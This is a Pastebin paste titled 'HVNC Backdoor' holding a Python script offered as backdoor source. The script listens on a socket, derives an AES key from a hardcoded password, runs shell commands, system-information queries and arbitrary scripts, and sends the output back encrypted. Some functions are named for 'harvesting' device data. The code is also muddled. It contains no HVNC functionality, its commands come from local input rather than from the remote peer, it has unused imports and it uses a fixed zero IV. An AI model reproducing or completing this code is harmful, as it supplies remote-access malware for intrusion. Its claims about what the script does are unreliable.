API tools faq
paste
Advertisement
WhosYourDaddySec

HVNC Backdoor

WhosYourDaddySec
Nov 20th, 2023
109
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.46 KB | None | 0 0
raw download clone embed print report
  1. import socket
  2. import subprocess
  3. import paramiko
  4. import threading
  5. from cryptography.hazmat.backends import default_backend
  6. from cryptography.hazmat.primitives import hashes
  7. from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
  8. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  9.  
  10. class SecureConnectionManager:
  11. def __init__(self, host, port, password):
  12. self.host = host
  13. self.port = port
  14. self.password = password
  15.  
  16. def establish_connection(self):
  17. server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18. server_socket.bind((self.host, self.port))
  19. server_socket.listen(1)
  20.  
  21. client_socket, _ = server_socket.accept()
  22. shared_key = self.derive_shared_key(client_socket)
  23. return client_socket, shared_key
  24.  
  25. def derive_shared_key(self, client_socket):
  26. salt = client_socket.recv(16)
  27. kdf = PBKDF2HMAC(
  28. algorithm=hashes.SHA256(),
  29. iterations=100000,
  30. salt=salt,
  31. length=32,
  32. backend=default_backend()
  33. )
  34. key = kdf.derive(self.password.encode())
  35. return key
  36.  
  37. def encrypt(self, data, key):
  38. cipher = Cipher(algorithms.AES(key), modes.CFB(b'\0' * 16), backend=default_backend())
  39. encryptor = cipher.encryptor()
  40. encrypted_data = encryptor.update(data.encode()) + encryptor.finalize()
  41. return encrypted_data
  42.  
  43. def decrypt(self, encrypted_data, key):
  44. cipher = Cipher(algorithms.AES(key), modes.CFB(b'\0' * 16), backend=default_backend())
  45. decryptor = cipher.decryptor()
  46. decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
  47. return decrypted_data.decode()
  48.  
  49. def send_command(self, client_socket, command, key):
  50. encrypted_command = self.encrypt(command, key)
  51. client_socket.send(encrypted_command)
  52.  
  53. def receive_output(self, client_socket, key):
  54. encrypted_response = client_socket.recv(4096)
  55. response = self.decrypt(encrypted_response, key)
  56. return response
  57.  
  58. def close_connection(self, client_socket):
  59. client_socket.close()
  60.  
  61. class AdminTool:
  62. @staticmethod
  63. def execute_command(command):
  64. try:
  65. output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
  66. except subprocess.CalledProcessError as e:
  67. output = f"Error: {e.output}"
  68.  
  69. return output
  70.  
  71. @staticmethod
  72. def handle_advanced_logic(command):
  73. # Realistic example: Check if the command is a file search and execute it.
  74. if "search_files" in command:
  75. result = subprocess.check_output(["find", "/path/to/search", "-name", "*.txt"], universal_newlines=True)
  76. else:
  77. result = "Invalid advanced command."
  78.  
  79. return result
  80.  
  81. @staticmethod
  82. def harvest_device_data():
  83. # Realistic example: Fetch system information using a custom script.
  84. try:
  85. data = subprocess.check_output(["python", "system_info_script.py"], universal_newlines=True)
  86. except subprocess.CalledProcessError as e:
  87. data = f"Error harvesting device data: {e.output}"
  88.  
  89. return data
  90.  
  91. @staticmethod
  92. def system_info():
  93. try:
  94. info = subprocess.check_output(['systeminfo'], shell=True, universal_newlines=True)
  95. except subprocess.CalledProcessError as e:
  96. info = f"Error retrieving system information: {e.output}"
  97.  
  98. return info
  99.  
  100. @staticmethod
  101. def run_custom_script(script_path):
  102. try:
  103. result = subprocess.check_output(['python', script_path], shell=True, universal_newlines=True)
  104. except subprocess.CalledProcessError as e:
  105. result = f"Error running custom script: {e.output}"
  106.  
  107. return result
  108.  
  109. if __name__ == '__main__':
  110. password = "your_super_secret_password"
  111. connection_manager = SecureConnectionManager("127.0.0.1", 8000, password)
  112.  
  113. try:
  114. client_socket, shared_key = connection_manager.establish_connection()
  115.  
  116. options = {
  117. "1": ("Run System Command", "echo 'Hello, World!'"),
  118. "2": ("Advanced Logic", "search_files"),
  119. "3": ("Harvest Device Data", "harvest_data"),
  120. "4": ("System Information", "system_info"),
  121. "5": ("Run Custom Script", "custom_script.py")
  122. }
  123.  
  124. for key, (description, command) in options.items():
  125. print(f"{key}. {description}")
  126.  
  127. choice = input("Select an option: ")
  128.  
  129. if choice in options:
  130. admin_command = options[choice][1]
  131.  
  132. if admin_command == "search_files":
  133. response = AdminTool.handle_advanced_logic(admin_command)
  134. elif admin_command == "harvest_data":
  135. response = AdminTool.harvest_device_data()
  136. elif admin_command == "system_info":
  137. response = AdminTool.system_info()
  138. elif admin_command == "custom_script.py":
  139. response = AdminTool.run_custom_script(admin_command)
  140. else:
  141. response = AdminTool.execute_command(admin_command)
  142.  
  143. connection_manager.send_command(client_socket, response, shared_key)
  144. print(f"Response: {response}")
  145.  
  146. connection_manager.close_connection(client_socket)
  147.  
  148. except Exception as e:
  149. print(f"Error in main execution: {e}")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!